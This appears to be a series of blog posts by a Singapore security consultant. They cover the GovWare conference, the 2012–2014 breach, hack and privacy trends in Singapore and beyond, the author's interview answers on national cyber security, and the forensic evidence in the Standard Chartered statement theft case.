Government Ware (GovWare) 2015

Government Ware or GovWare is an annual security conference organized by the agencies of Singapore Government to showcase the latest cyber security talks, booths, vendors and products. This year's theme was 'Building a Secure Smart Nation', held in Suntec Singapore. This is one of the conferences that one should go to check out the competition as well as network! 

2014 - Year of the Privacy?

2012 was a year known famously for the amount of security breaches made. From Sony to Yahoo to Google have inadvertently had their personal data being leaked out. Most breaches were done from the server side.

Source: http://venturebeat.com/2012/09/17/2012-security-breaches/

Source: http://venturebeat.files.wordpress.com/2012/09/securitybreaches_25.png

2013 on the other hand was labelled as the year of the hack. As early as March 2013, companies from Apple, to Facebook and Twitter got hacked and this does not include the hacking incidents in Singapore.

Source: http://www.transfirst.com/blog/extensive-hacking-incidents-label-2013-the-year-of-the-hack

For Singapore, 2013 is seen as the year with a record of hacking incidents. Hacking related incidents such as the hack on Kong Hee's wife website to Anonymous threats to Singapore Government, the XSS attack on PMO and ISTANA website, the web defacement to Singapore schools websites, Singapore's Museum website and personal information got leaked and recently, the bank statements of Standard Chartered high profile clients got stolen.

Kong Hee's Wife Website Hacked

Source: http://www.straitstimes.com/the-big-story/chc-funds-case/story/city-harvest-church-leader-kong-hee-condemns-hacking-his-wifes-we

AMK Town Council Website Hacked

Source: http://sg.news.yahoo.com/ang-mo-kio-town-council-website-hacked-102124881.html

Anonymous Threats and Hacks in Singapore

Source: http://www.straitstimes.com/breaking-news/singapore/story/government-agencies-alert-after-hackers-threaten-attacks-20131101

Source: http://singapore.coconuts.co/2013/10/31/video-anonymous-hacktivists-warns-singapore-government

Source: http://sg.news.yahoo.com/singapore-newspaper-straits-times-hacked-020043975.html

Singapore Art Museum Website Hacked

Source: http://www.straitstimes.com/breaking-news/singapore/story/sam-website-hacked-second-cyber-intrusion-within-month-20131129

Singapore Schools Websites Hacked

Source: http://www.straitstimes.com/breaking-news/singapore/story/twelve-13-school-websites-hacked-wednesday-still-down-9am-thursday-201

Standard Chartered Clients Statements Stolen

Source: http://www.todayonline.com/singapore/standard-chartered-clients-monthly-bank-statement-stolen

With such a record number of hacking incidents in Singapore, 2013 will be known as the year Singapore got hacked the most. The year many security professionals from private organizations to governments, were placed on high alert and standby. It was indeed a tough year for security professionals in Singapore.

So what will 2014 be? 

A preview of whats going to happen were shown throughout 2013. Privacy has been another hot topic besides hacking. The case of Edward Snowden leaking out files from the NSA which tackles the US government spying on its citizens, the security of encryption keys, the spying of Malaysia by Singapore, the spying of Indonesia by Australia, the privacy of consumers against telemarketers

The Serious Leaks by Snowden

Source: http://www.theage.com.au/comment/snowden-revelations-only-the-beginning-20131229-301j6.html

The Allegations against Encryption Companies

Source: http://www.theguardian.com/world/2013/dec/20/nsa-internet-security-rsa-secret-10m-encryption

The Spying of Indonesia by Australia

Source: http://www.presstv.com/detail/2013/12/06/338456/australia-will-still-spy-on-indonesia/

The Spying Report of Malaysia by Singapore

Source: http://www.reuters.com/article/2013/11/26/us-malaysia-singapore-spying-idUSBRE9AP03P20131126

PDPC Backfires on Consumer's Privacy

Source: http://sg.news.yahoo.com/exemptions-provided-for-do-not-call-registry-033938964.html

All of these are previews of what may happen and will be the hot topic of discussion for 2014. While hacking will not stop, i predict that 2014 will be the year of privacy. The year of consumers questioning the privacy of their data and personal information. The year where companies will start concerning themselves with the security of their clients data. The year security vendors will get the most calls about privacy concerns and solutions. 

Even the Security Rockstar Bruce Schneier in his interview with 'Motherboard' said the following related to the security of our data:

"I'm worried about governments, the US and other governments. I'm worried about how they are using our data, how they're storing our data, and what happens to it. I'm less worried about the criminals. I think we've kinda got cyber-crime under control, it's not zero but it never will be. I'm much more worried about the powerful abusing us than the un-powerful abusing us."

Source: http://motherboard.vice.com/blog/an-interview-with-bruce-schneier

So in summary:

2012: the year of Security Breaches

2013: the year of the Hack

2014: the year of Privacy (just a prediction)

Cyber Security in Singapore - Opinions

Recently i was invited by a local radio station to give a talk about Cyber Security in Singapore but due to company and legal reason, i had to decline the opportunity. Nonetheless, these were the questions i was supposed to answer during the talk show.

1) Cyber security in Singapore - has the recent hacking episodes exposed a "weakness" in Singapore's cyber security?

I wouldnt call it a weakness but an eye opener as to what else could be done by potential skillful hackers. In one of the hacking movies back in the 80s called 'Wargames', David Lightman, the hacker stated that 'I dont believe that any systems is totally secure' when someone told him that it was impossible to gain access to the systems. Taking that quote, i believed that there is no way to say that a system, a server or a website is totally 100% secure. There will always bound to have a potential issue, potential backdoor, security misconfigurations, missing or outdated patches that can be taken advantage and exploited. Before the much talked hackings of government sites lately, back in 2011, 17 of our govt sites were defaced by a hacker group called Brazil Hack Team and fortunately, that was all they were able to do. The so called hacking of the Istana and PMO website were not really a hack. It was a client side exploitation of a vulnerability called XSS or Cross Site Scripting which do not affect the server side and still maintain the confidentiality, integrity and availability of the PMO's and Istana's website/server. In other words, nothing was leaked or compromised.

2) As an Ethical Hacker and Security Consultant, what do you think are the challenges in cyber security here, and worldwide?

One of the challenges that we faced not just in Singapore but also in other countries is investments in cyber security. Singapore, similarly like USA and Israel, we invested billions in physical military warfare but not much in the technology and manpower in cyber military. In my opinion, we should also invest not just the F-16s jets but also in technology and skills that could potentially bring down an F-16 jet by using a laptop. When i went to a security conference in Amsterdam, a hacker managed to show how he can potentially hack the control systems of an airplane. If we think that that is farfetched, in 2011, hackers from China managed to hack and control a NASA satellite for approximately 11minutes. Needless to say, when it comes to hacking, nothing is impossible.

Another thing is skillset. Before 2007, local instituitions, polytechnics and Universities do not have courses that involves Ethical hacking. These ethical hacking courses were mostly seen in private instituitions. In the US, schools are established for future and potential hackers. Hacker schools, hacking academy are created so that students are trained from young. In India for example, students are exposed to security at such a young age and you have people like Ankit Fadia, an Indian hacker who published a book on Ethical hacking at the age of 16. However, i am glad that the government understand the gravity of the importance of cyber security and since mid 2007 onwards, ethical hacking modules, courses are introduced in majority of the local institutions. The graduates from these faculties will be the ones who will safeguard our network and infrastructure.

The third thing is Security education and conferences. In Singapore there are not many security conferences that are open to public. There is one that holds annually here called Syscan and i believed that such a conference will benefit the security community here in Singapore. There are also other conferences such as GovWare but such government sponsored conferences are not open publicly and can be expensive at times. If we look at countries such as US, in Europe and even in Malaysia, there are a number of conferences held every year and are affordable and open to the public. Singapore must learn from such countries and organize more conferences open to public that can educate the public in security awareness and the importance of the roles they play in the organizations. Remember that security is a shared responsibility. 

3) Are companies here prepared to deal with cyber challenges? Why or why not?

As long as the company invests in cyber security, i believed that those companies are more or less prepared for potential cyber challenges. Whenever there's a hacking incident, security officers and management will question 3 important things: whether the Confidentiality, the Integrity and the Availability of the information got compromised. Therefore, even if the website got defaced at least the information or data are not compromised, stolen or leaked.

 

4) What have been your experiences in ethically "hacking" company sites? What more can be done?

One of the most important things before ethically hacking company sites or servers is to ensure we agreed on the rules of engagement, the DOs and the DONTs. Trust is a very important matter. Just imagine if we are able to compromise a credit card database,  this is where the word ethical comes into hacking. Such major findings will be alerted to the stakeholders and we will assist them through recommendations on how to remediate such findings. Security managers in organizations must also understand the difference between performing a vulnerability assessments and a penetration testing assessment. Both may sound similar but totally different when applied. 

Companies can additionally invest on security services that perform vulnerability assessments, risks analysis on a periodic basis instead of doing it just because they have to abide by their policies and audit requirements.

Standard Chartered 'Hacked'

Hack, Evidence, Prosecution, Processes, Trust and Moving on.....

Source: http://www.ft.com/cms/s/0/8e10be78-5dab-11e3-95bd-00144feabdc0.html#axzz2mkcg5Z2Y

In a recent incident involving James Raj allegedly known as The Messiah, Standard Chartered client statements were found on James Raj's laptop. This quickly escalated to the readers on the journey to hate the Anonymous group that James Raj was supposedly part of. 

While we have no visibility as to how the data got into James Raj laptop, one thing i would questioned is the evidence gathered. It is not just simply about blaming him since the data was on his laptop. Investigators must find evidence that can illustrate that it was indeed James Raj who stole the information. This must be in the form of logs from both the laptop and Fuji Xerox. A company like Fuji Xerox would surely have all the log gatherings and management in place and investigators must ensure that the log tallies confirming that there was indeed a network connection being made from James Raj IP address to the Fuji Xerox's server. 

Cyber forensic investigators must also be able to retrieve the logs from the laptop to confirm that his laptop was not just being used but to confirm that there were no other connections made from other sources connecting to James Raj's machine and used it as a proxy to attack FX. Timing of connections made must be in sync. Metadata of logs should not be tampered (especially by amateurs evidence handlers)

Below is a high level graphical example as how James Raj's machine could be used in the stealing of data.

How could this be possible?

During #OpTunisia, there were alot of protests against the Tunisian government. This led to outsiders wanting to take part as well. As they were outside of Tunisia, they relied on the internet to voice out their unhappiness against the Tunisian government. Government websites were hacked and defaced (no information was stolen) by hackers. The Tunisian government fought back by blocking all connections outside of Tunisia to connect to the government websites. A hacker known as Sabu managed to find a Tunisian citizen machine to use as a proxy to connect to the government website. All he had to do was to connect to that machine as a proxy and attack the Tunisian government website from that machine. Reports stated that due to little pool of experts in handling such incidents, the owner of that machine was arrested and left the hacker free.  

Source: From the Book 'We are Anonymous' by Parmy Olson. Page 143 - 146

Lesson that we can Learn

Skillful hackers do not connect and hack directly to the target from their own machines but that does not mean that n00b hackers do not know how to hide their tracks as well. Investigators will need to identify the logs properly and securely and ensure that in no way the evidence are tampered during the course of investigation. These logs must be in both the machine and the server to ensure that the evidence that connections made are true and in sync. If logs or files are suspected to be deleted,  investigators should clone the entire image of the hard disk, use a data recovery tool and identify the evidence from there. The operating system itself should be checked whether ports such as telnet and other shell like services or vulnerabilities were opened/present. This could be another evidence to suggest that James Raj's laptop were already vulnerable to have other machines connecting to his laptop possibly using his machine to leverage on the attack. Until all these are gathered, only then will the public be confident of the methodologies, processes and techniques used during the gathering of the evidence and cover all possible factors of external party using Raj's machine as a proxy to attack.

Recent News may give Govt a Hard Time

Recent news about a government chemist in the States who was found guilty on tampering with evidence which resulted in many innocents going to jail will definitely be running in many minds questioning about the genuinity of the evidence and prosecution of James Raj should James Raj be found guilty of the charges made against him.

Source: http://filmingcops.com/corrupt-government-chemist-tampered-with-40000-cases-locking-countless-innocent-americans-in-prison/

Source: http://filmingcops.com/breaking-another-government-chemist-accused-of-deception-over-180000-cases-now-need-review/

Moving Forward

In order for organizations and companies to know whether they are ready for such an attack is to perform vulnerability assessments on their network and servers. Only then will they know how they can fare against a potential attack. One of the mistakes made by organizations is trusting their own security department on handling such assessments but as they always say, its better to have a new pair of eyes to see what their own internal team may be blinded to (similarly like doing an audit). Hire ethical hackers/pentesters to simulate a real world attack on your servers and networks and see how deep they could penetrate into. Of course, rules of engagements and non disclosure agreement must be made to maintain confidentiality and integrity of the assessment with both parties involved.